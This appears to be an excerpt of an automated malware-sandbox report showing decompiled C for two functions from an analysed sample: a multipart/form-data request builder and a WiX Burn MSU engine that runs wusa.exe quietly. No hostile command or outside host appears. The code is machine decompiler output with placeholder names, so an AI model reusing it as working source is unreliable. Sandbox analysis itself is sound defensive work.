                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeavelstrlen
                                                                                                                                                                  • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                                  • API String ID: 3224049430-2050445661
                                                                                                                                                                  • Opcode ID: db9ca18f5e1b12dec400090e8c8520715f26cd82cb2479434f294d2e336113c1
                                                                                                                                                                  • Instruction ID: e56affa54584c2a209784e5a82feb1a89c1aca6f61e23f9d521c428dc41282fa
                                                                                                                                                                  • Opcode Fuzzy Hash: db9ca18f5e1b12dec400090e8c8520715f26cd82cb2479434f294d2e336113c1
                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE1B671E40229ABDB119FA58E85AAF76B8AF08754F10517BFD00BB2C1D77C9D018B9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100215A0, Relevance: 48.4, APIs: 32, Instructions: 449COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E100215A0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E100231DA);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018B00(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF80(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF80(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF80(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CCA3(_t353,  &_v808, _v812, _a16);
					E1000CCA3(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CCA3(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D1F0(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAD0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAD0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF80(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF80(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF80(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF80(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10003060( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A8B0(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E10002270( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF80(_t353,  &_v43912, 0, 0x3710);
								E1000CF80(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084));
								E1000D1F0(_t265, _t353, _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E100030B0( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)));
								E1000D903(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF80(_t353,  &_v58008, 0, 0x3710);
								E1000CF80(_t353,  &_v29808, 0, 0x3710);
								E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CCA3(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAD0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAD0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003090( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D1F0(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D903(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF80(_t353,  &_v58008, 0, 0x3710);
							E1000CF80(_t353,  &_v29808, 0, 0x3710);
							E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CCA3(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAD0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAD0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF80(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CCA3(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAD0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAD0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}


















































                                                                                                                                                                  0x100215a0
                                                                                                                                                                  0x100215a0
                                                                                                                                                                  0x100215a3
                                                                                                                                                                  0x100215a5
                                                                                                                                                                  0x100215b0
                                                                                                                                                                  0x100215b1
                                                                                                                                                                  0x100215bd
                                                                                                                                                                  0x100215c2
                                                                                                                                                                  0x100215c3
                                                                                                                                                                  0x100215ca
                                                                                                                                                                  0x100215d5
                                                                                                                                                                  0x10021603
                                                                                                                                                                  0x1002160d
                                                                                                                                                                  0x10021617
                                                                                                                                                                  0x10021621
                                                                                                                                                                  0x10021636
                                                                                                                                                                  0x1002163e
                                                                                                                                                                  0x10021653
                                                                                                                                                                  0x1002165b
                                                                                                                                                                  0x10021670
                                                                                                                                                                  0x1002167b
                                                                                                                                                                  0x1002167f
                                                                                                                                                                  0x10021692
                                                                                                                                                                  0x100216ac
                                                                                                                                                                  0x100216ba
                                                                                                                                                                  0x100216c1
                                                                                                                                                                  0x100216c5
                                                                                                                                                                  0x100216d8
                                                                                                                                                                  0x100216dd
                                                                                                                                                                  0x100216e6
                                                                                                                                                                  0x10021708
                                                                                                                                                                  0x1002170d
                                                                                                                                                                  0x1002170d
                                                                                                                                                                  0x10021717
                                                                                                                                                                  0x1002171c
                                                                                                                                                                  0x10021722
                                                                                                                                                                  0x1002172b
                                                                                                                                                                  0x1002173e
                                                                                                                                                                  0x10021743
                                                                                                                                                                  0x10021743
                                                                                                                                                                  0x1002174c
                                                                                                                                                                  0x1002174c
                                                                                                                                                                  0x10021753
                                                                                                                                                                  0x1002176c
                                                                                                                                                                  0x10021771
                                                                                                                                                                  0x10021776
                                                                                                                                                                  0x1002177c
                                                                                                                                                                  0x10021786
                                                                                                                                                                  0x10021790
                                                                                                                                                                  0x100217a5
                                                                                                                                                                  0x100217ad
                                                                                                                                                                  0x100217c2
                                                                                                                                                                  0x100217ca
                                                                                                                                                                  0x100217df
                                                                                                                                                                  0x100217e7
                                                                                                                                                                  0x100217fc
                                                                                                                                                                  0x1002180d
                                                                                                                                                                  0x10021812
                                                                                                                                                                  0x10021815
                                                                                                                                                                  0x10021822
                                                                                                                                                                  0x10021942
                                                                                                                                                                  0x10021947
                                                                                                                                                                  0x10021954
                                                                                                                                                                  0x10021959
                                                                                                                                                                  0x10021968
                                                                                                                                                                  0x1002196d
                                                                                                                                                                  0x10021986
                                                                                                                                                                  0x1002198b
                                                                                                                                                                  0x1002198e
                                                                                                                                                                  0x100219a9
                                                                                                                                                                  0x100219af
                                                                                                                                                                  0x100219b4
                                                                                                                                                                  0x100219ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100219ce
                                                                                                                                                                  0x100219e4
                                                                                                                                                                  0x10021a0b
                                                                                                                                                                  0x10021a2e
                                                                                                                                                                  0x10021a52
                                                                                                                                                                  0x10021a91
                                                                                                                                                                  0x10021aa7
                                                                                                                                                                  0x10021abd
                                                                                                                                                                  0x10021ada
                                                                                                                                                                  0x10021ae8
                                                                                                                                                                  0x10021aef
                                                                                                                                                                  0x10021af3
                                                                                                                                                                  0x10021b06
                                                                                                                                                                  0x10021b0b
                                                                                                                                                                  0x10021b11
                                                                                                                                                                  0x10021b14
                                                                                                                                                                  0x10021b1d
                                                                                                                                                                  0x10021b32
                                                                                                                                                                  0x10021b36
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b45
                                                                                                                                                                  0x10021b4a
                                                                                                                                                                  0x10021b50
                                                                                                                                                                  0x100219a0
                                                                                                                                                                  0x100219a0
                                                                                                                                                                  0x100219a3
                                                                                                                                                                  0x100219a3
                                                                                                                                                                  0x10021b58
                                                                                                                                                                  0x10021b62
                                                                                                                                                                  0x10021b67
                                                                                                                                                                  0x10021b71
                                                                                                                                                                  0x10021b76
                                                                                                                                                                  0x10021b83
                                                                                                                                                                  0x10021828
                                                                                                                                                                  0x10021848
                                                                                                                                                                  0x10021871
                                                                                                                                                                  0x10021887
                                                                                                                                                                  0x1002189d
                                                                                                                                                                  0x100218ba
                                                                                                                                                                  0x100218c8
                                                                                                                                                                  0x100218cf
                                                                                                                                                                  0x100218d3
                                                                                                                                                                  0x100218e6
                                                                                                                                                                  0x100218eb
                                                                                                                                                                  0x100218f4
                                                                                                                                                                  0x10021916
                                                                                                                                                                  0x1002191b
                                                                                                                                                                  0x1002191b
                                                                                                                                                                  0x10021925
                                                                                                                                                                  0x1002192a
                                                                                                                                                                  0x10021930
                                                                                                                                                                  0x10021930
                                                                                                                                                                  0x10021822
                                                                                                                                                                  0x10021776
                                                                                                                                                                  0x10021b88
                                                                                                                                                                  0x10021b8f
                                                                                                                                                                  0x10021ba4
                                                                                                                                                                  0x10021baf
                                                                                                                                                                  0x10021bb3
                                                                                                                                                                  0x10021bc3
                                                                                                                                                                  0x10021bc8
                                                                                                                                                                  0x10021bd1
                                                                                                                                                                  0x10021bf3
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021c0d
                                                                                                                                                                  0x10021c16
                                                                                                                                                                  0x10021c21

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 854390245-0
                                                                                                                                                                  • Opcode ID: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction ID: cf3fdb6315e205635e4887c8713e315fd67cdd6efcc5cedbeed1e245040bfa00
                                                                                                                                                                  • Opcode Fuzzy Hash: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction Fuzzy Hash: F50292B6D00208ABDB10DB54DC82FDE777CEB58244F444598F509A7285EB75BB88CFA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041DB33, Relevance: 47.6, APIs: 6, Strings: 21, Instructions: 328COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                  			E0041DB33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				signed short _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				struct _PROCESS_INFORMATION _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				struct _STARTUPINFOW _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t95;
				signed short _t97;
				signed short _t100;
				signed short _t101;
				signed short _t102;
				signed short _t109;
				signed short _t112;
				signed short _t114;
				signed short _t128;
				signed short _t131;
				signed short _t136;
				void* _t156;
				signed short _t163;
				long _t164;
				signed short _t167;
				signed short _t172;
				void* _t178;
				intOrPtr* _t181;
				intOrPtr _t183;
				void* _t186;
				void* _t187;
				void* _t188;

				_t173 = __ecx;
				_push(0x44);
				_push(0);
				_push( &_v136);
				_v24 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v32 = 0;
				_v36 = 0;
				E004267C0(_t156, __ecx, _t178, 0, __eflags);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t187 = _t186 + 0xc;
				asm("stosd");
				_t181 = _a20;
				_v28 = 0;
				 *_t181 = 0;
				if(E00431D07(__ecx, _t181, 0x25,  &_v20) >= 0) {
					_t95 = E004314A9(_v20, L"wusa.exe",  &_v12);
					__eflags = _t95;
					if(_t95 >= 0) {
						_t183 = _a4;
						_t97 =  *((intOrPtr*)(_t183 + 0x10)) - 1;
						__eflags = _t97;
						if(_t97 == 0) {
							_push( *( *((intOrPtr*)(_t183 + 8)) + 0x94));
							_t100 = E00433CEA( &_v8, L"\"%ls\" /uninstall /kb:%ls /quiet /norestart", _v12);
							_t188 = _t187 + 0x10;
							__eflags = _t100;
							if(_t100 >= 0) {
								goto L15;
							} else {
								_push("Failed to format MSU uninstall command.");
								goto L33;
							}
						} else {
							__eflags = _t97 == 1;
							if(_t97 == 1) {
								_t163 = E00413BE9(__ecx, _t181, 1,  *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)) + 0x24)),  &_v24);
								__eflags = _t163;
								if(_t163 >= 0) {
									_t163 = E004314A9(_v24,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)) + 0x7c)))) + 0x18)),  &_v16);
									__eflags = _t163;
									if(_t163 >= 0) {
										_push(_v16);
										_t163 = E00433CEA( &_v8, L"\"%ls\" \"%ls\" /quiet /norestart", _v12);
										_t188 = _t187 + 0x10;
										__eflags = _t163;
										if(_t163 >= 0) {
											L15:
											_t101 =  *(_t183 + 0xc);
											__eflags = _t101;
											if(_t101 == 0) {
												L21:
												_t102 = _v16;
												__eflags = _t102;
												if(_t102 == 0) {
													_t102 =  *( *((intOrPtr*)(_t183 + 8)) + 0x94);
												}
												_push(_v8);
												_push(_t102);
												_push(E0040E2BB( *((intOrPtr*)(_t183 + 0x10))));
												_push( *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)))));
												E00402003(2, 0x2000012d, E0040E8FD(_a8));
												_t187 = _t188 + 0x1c;
												_t109 = E0041D8E0( &_v32,  &_v36);
												__eflags = _t109;
												if(_t109 >= 0) {
													_v136.cb = 0x44;
													_t112 = CreateProcessW(_v12, _v8, 0, 0, 0, 0x8000000, 0, 0,  &_v136,  &_v52);
													__eflags = _t112;
													if(_t112 != 0) {
														do {
															_v68 = 2;
															_v64 = 1;
															_v60 = 0x32;
															_t114 = _a12( &_v68, _a16);
															__eflags = _t114 - 1;
															if(_t114 == 1) {
																goto L29;
															} else {
																__eflags = _t114;
																if(_t114 != 0) {
																	__eflags = _t114 - 2;
																	_t163 = (0 | _t114 != 0x00000002) + 0x80070642;
																	E004300D9(_t114, "msuengine.cpp", 0x14d, _t163);
																	_push("Bootstrapper application aborted during MSU progress.");
																	goto L33;
																} else {
																	goto L29;
																}
															}
															goto L46;
															L29:
															_t163 = E00431FB6(_t173, _v52.hProcess, 0x1f4,  &_v28);
															__eflags = _t163 - 0x80070102;
														} while (_t163 == 0x80070102);
														__eflags = _t163;
														if(_t163 < 0) {
															_push(_v12);
															_push("Failed to wait for executable to complete: %ls");
															goto L45;
														} else {
															_t128 = GetExitCodeProcess(_v52.hProcess,  &_v28);
															__eflags = _t128;
															if(_t128 != 0) {
																_t164 = _v28;
																__eflags = _t164 - 0x80070bc2;
																_t163 =  ==  ? 0xbc2 : _t164;
																_v28 = _t163;
																__eflags = _t163;
																if(_t163 == 0) {
																	L43:
																	_t163 = 0;
																} else {
																	__eflags = _t163 - 1;
																	if(_t163 == 1) {
																		goto L43;
																	} else {
																		__eflags = _t163 - 0xbc2;
																		if(_t163 == 0xbc2) {
																			L42:
																			 *_t181 = 1;
																			goto L43;
																		} else {
																			__eflags = _t163 - 0x240005;
																			if(_t163 == 0x240005) {
																				goto L42;
																			} else {
																				__eflags = _t163 - 0x240006;
																				if(_t163 == 0x240006) {
																					goto L43;
																				} else {
																					__eflags = _t163 - 0x80240017;
																					if(_t163 == 0x80240017) {
																						goto L43;
																					} else {
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t131 = GetLastError();
																__eflags = _t131;
																_t167 =  <=  ? _t131 : _t131 & 0x0000ffff | 0x80070000;
																__eflags = _t167;
																_t163 =  >=  ? 0x80004005 : _t167;
																E004300D9(0x80004005, "msuengine.cpp", 0x15a, _t163);
																_push("Failed to get process exit code.");
																goto L33;
															}
														}
													} else {
														_t136 = GetLastError();
														__eflags = _t136;
														_t172 =  <=  ? _t136 : _t136 & 0x0000ffff | 0x80070000;
														__eflags = _t172;
														_t163 =  >=  ? 0x80004005 : _t172;
														E004300D9(0x80004005, "msuengine.cpp", 0x143, _t163);
														_push(_v12);
														_push("Failed to CreateProcess on path: %ls");
														goto L45;
													}
												} else {
													_push("Failed to ensure WU service was enabled to install MSU package.");
													goto L33;
												}
											} else {
												_t173 = 0;
												__eflags =  *_t101;
												if( *_t101 == 0) {
													goto L21;
												} else {
													_t163 = E00433C35(0,  &_v8, L" /log:", 0);
													__eflags = _t163;
													if(_t163 >= 0) {
														_t163 = E00433C35(0,  &_v8,  *(_t183 + 0xc), 0);
														__eflags = _t163;
														if(_t163 >= 0) {
															goto L21;
														} else {
															_push("Failed to append log path to MSU command-line.");
															goto L33;
														}
													} else {
														_push("Failed to append log switch to MSU command-line.");
														goto L33;
													}
												}
											}
										} else {
											_push("Failed to format MSU install command.");
											goto L33;
										}
									} else {
										_push("Failed to build MSU path.");
										goto L33;
									}
								} else {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)))));
									_push("Failed to get cached path for package: %ls");
									L45:
									_push(_t163);
									E00430A57();
								}
							} else {
								_t163 = 0x8000ffff;
								_push("Failed to get action arguments for MSU package.");
								goto L33;
							}
						}
					} else {
						_push("Failed to allocate WUSA.exe path.");
						goto L33;
					}
				} else {
					_push("Failed to find System32 directory.");
					L33:
					_push(_t163);
					E00430A57();
				}
				L46:
				if(_v24 != 0) {
					E004380AB(_v24);
				}
				if(_v16 != 0) {
					E004380AB(_v16);
				}
				if(_v20 != 0) {
					E004380AB(_v20);
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				if(_v52.hProcess != 0) {
					CloseHandle(_v52.hProcess);
					_v52.hProcess = _v52 & 0x00000000;
				}
				if(_v52.hThread != 0) {
					CloseHandle(_v52.hThread);
					_v52.hThread = _v52.hThread & 0x00000000;
				}
				if(_v36 != 0) {
					E0041DA76(_v32, 4);
				}
				return _t163;
			}









































                                                                                                                                                                  0x0041db33
                                                                                                                                                                  0x0041db41
                                                                                                                                                                  0x0041db49
                                                                                                                                                                  0x0041db4a
                                                                                                                                                                  0x0041db4b
                                                                                                                                                                  0x0041db4e
                                                                                                                                                                  0x0041db51
                                                                                                                                                                  0x0041db54
                                                                                                                                                                  0x0041db57
                                                                                                                                                                  0x0041db5a
                                                                                                                                                                  0x0041db5d
                                                                                                                                                                  0x0041db60
                                                                                                                                                                  0x0041db6a
                                                                                                                                                                  0x0041db6b
                                                                                                                                                                  0x0041db6c
                                                                                                                                                                  0x0041db6d
                                                                                                                                                                  0x0041db73
                                                                                                                                                                  0x0041db74
                                                                                                                                                                  0x0041db75
                                                                                                                                                                  0x0041db76
                                                                                                                                                                  0x0041db79
                                                                                                                                                                  0x0041db7a
                                                                                                                                                                  0x0041db83
                                                                                                                                                                  0x0041db86
                                                                                                                                                                  0x0041db91
                                                                                                                                                                  0x0041dba9
                                                                                                                                                                  0x0041dbb0
                                                                                                                                                                  0x0041dbb2
                                                                                                                                                                  0x0041dbbe
                                                                                                                                                                  0x0041dbc4
                                                                                                                                                                  0x0041dbc4
                                                                                                                                                                  0x0041dbc5
                                                                                                                                                                  0x0041dc54
                                                                                                                                                                  0x0041dc66
                                                                                                                                                                  0x0041dc6d
                                                                                                                                                                  0x0041dc70
                                                                                                                                                                  0x0041dc72
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dc74
                                                                                                                                                                  0x0041dc74
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dc74
                                                                                                                                                                  0x0041dbcb
                                                                                                                                                                  0x0041dbcb
                                                                                                                                                                  0x0041dbcc
                                                                                                                                                                  0x0041dbee
                                                                                                                                                                  0x0041dbf0
                                                                                                                                                                  0x0041dbf2
                                                                                                                                                                  0x0041dc1a
                                                                                                                                                                  0x0041dc1c
                                                                                                                                                                  0x0041dc1e
                                                                                                                                                                  0x0041dc2a
                                                                                                                                                                  0x0041dc3e
                                                                                                                                                                  0x0041dc40
                                                                                                                                                                  0x0041dc43
                                                                                                                                                                  0x0041dc45
                                                                                                                                                                  0x0041dc7e
                                                                                                                                                                  0x0041dc7e
                                                                                                                                                                  0x0041dc81
                                                                                                                                                                  0x0041dc83
                                                                                                                                                                  0x0041dcc9
                                                                                                                                                                  0x0041dcc9
                                                                                                                                                                  0x0041dccc
                                                                                                                                                                  0x0041dcce
                                                                                                                                                                  0x0041dcd3
                                                                                                                                                                  0x0041dcd3
                                                                                                                                                                  0x0041dcd9
                                                                                                                                                                  0x0041dcdc
                                                                                                                                                                  0x0041dce5
                                                                                                                                                                  0x0041dce9
                                                                                                                                                                  0x0041dcfb
                                                                                                                                                                  0x0041dd00
                                                                                                                                                                  0x0041dd0b
                                                                                                                                                                  0x0041dd12
                                                                                                                                                                  0x0041dd14
                                                                                                                                                                  0x0041dd3a
                                                                                                                                                                  0x0041dd47
                                                                                                                                                                  0x0041dd4d
                                                                                                                                                                  0x0041dd4f
                                                                                                                                                                  0x0041dd8c
                                                                                                                                                                  0x0041dd96
                                                                                                                                                                  0x0041dd9d
                                                                                                                                                                  0x0041dda0
                                                                                                                                                                  0x0041dda7
                                                                                                                                                                  0x0041ddaa
                                                                                                                                                                  0x0041ddac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ddae
                                                                                                                                                                  0x0041ddae
                                                                                                                                                                  0x0041ddb0
                                                                                                                                                                  0x0041de25
                                                                                                                                                                  0x0041de2b
                                                                                                                                                                  0x0041de3c
                                                                                                                                                                  0x0041de41
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ddb0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ddb2
                                                                                                                                                                  0x0041ddc3
                                                                                                                                                                  0x0041ddc5
                                                                                                                                                                  0x0041ddc5
                                                                                                                                                                  0x0041ddcd
                                                                                                                                                                  0x0041ddcf
                                                                                                                                                                  0x0041de8b
                                                                                                                                                                  0x0041de8e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ddd5
                                                                                                                                                                  0x0041dddc
                                                                                                                                                                  0x0041dde2
                                                                                                                                                                  0x0041dde4
                                                                                                                                                                  0x0041de48
                                                                                                                                                                  0x0041de4b
                                                                                                                                                                  0x0041de56
                                                                                                                                                                  0x0041de59
                                                                                                                                                                  0x0041de5c
                                                                                                                                                                  0x0041de5e
                                                                                                                                                                  0x0041de87
                                                                                                                                                                  0x0041de87
                                                                                                                                                                  0x0041de60
                                                                                                                                                                  0x0041de63
                                                                                                                                                                  0x0041de65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041de67
                                                                                                                                                                  0x0041de67
                                                                                                                                                                  0x0041de69
                                                                                                                                                                  0x0041de85
                                                                                                                                                                  0x0041de85
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041de6b
                                                                                                                                                                  0x0041de6b
                                                                                                                                                                  0x0041de71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041de73
                                                                                                                                                                  0x0041de73
                                                                                                                                                                  0x0041de79
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041de7b
                                                                                                                                                                  0x0041de7b
                                                                                                                                                                  0x0041de81
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041de83
                                                                                                                                                                  0x0041de81
                                                                                                                                                                  0x0041de79
                                                                                                                                                                  0x0041de71
                                                                                                                                                                  0x0041de69
                                                                                                                                                                  0x0041de65
                                                                                                                                                                  0x0041dde6
                                                                                                                                                                  0x0041dde6
                                                                                                                                                                  0x0041ddf5
                                                                                                                                                                  0x0041ddf7
                                                                                                                                                                  0x0041ddff
                                                                                                                                                                  0x0041de01
                                                                                                                                                                  0x0041de0f
                                                                                                                                                                  0x0041de14
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041de14
                                                                                                                                                                  0x0041dde4
                                                                                                                                                                  0x0041dd51
                                                                                                                                                                  0x0041dd51
                                                                                                                                                                  0x0041dd60
                                                                                                                                                                  0x0041dd62
                                                                                                                                                                  0x0041dd6a
                                                                                                                                                                  0x0041dd6c
                                                                                                                                                                  0x0041dd7a
                                                                                                                                                                  0x0041dd7f
                                                                                                                                                                  0x0041dd82
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dd82
                                                                                                                                                                  0x0041dd16
                                                                                                                                                                  0x0041dd16
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dd16
                                                                                                                                                                  0x0041dc85
                                                                                                                                                                  0x0041dc85
                                                                                                                                                                  0x0041dc87
                                                                                                                                                                  0x0041dc8a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dc8c
                                                                                                                                                                  0x0041dc9b
                                                                                                                                                                  0x0041dc9d
                                                                                                                                                                  0x0041dc9f
                                                                                                                                                                  0x0041dcb9
